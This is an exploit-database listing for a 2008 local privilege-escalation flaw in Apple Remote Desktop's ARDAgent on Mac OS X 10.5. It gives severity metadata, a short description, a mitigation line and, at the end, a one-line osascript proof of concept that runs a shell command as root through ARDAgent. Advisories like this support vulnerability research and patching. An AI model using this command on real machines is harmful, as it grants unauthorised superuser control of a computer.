header-logo
Suggest Exploit
vendor:
Mac OS X
by:
SecurityFocus
7.2
CVSS
HIGH
Local Privilege-Escalation
264
CWE
Product Name: Mac OS X
Affected Version From: Mac OS X 10.5
Affected Version To: Mac OS X 10.5
Patch Exists: YES
Related CWE: N/A
CPE: o:apple:mac_os_x
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mac OS X
2008

Mac OS X Local Privilege-Escalation Vulnerability Affecting ARDAgent (Apple Remote Desktop)

Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop). Successful exploits allow local attackers to execute arbitrary code with superuser privileges, completely compromising the affected computer.

Mitigation:

Users should apply the appropriate updates to help mitigate the risk.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/29831/info

Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop).

Successful exploits allow local attackers to execute arbitrary code with superuser privileges, completely compromising the affected computer.

This issue is confirmed to affect Mac OS X 10.5 versions; earlier versions may also be vulnerable. 

osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

Navigation

Suggest Exploit

Services By CQR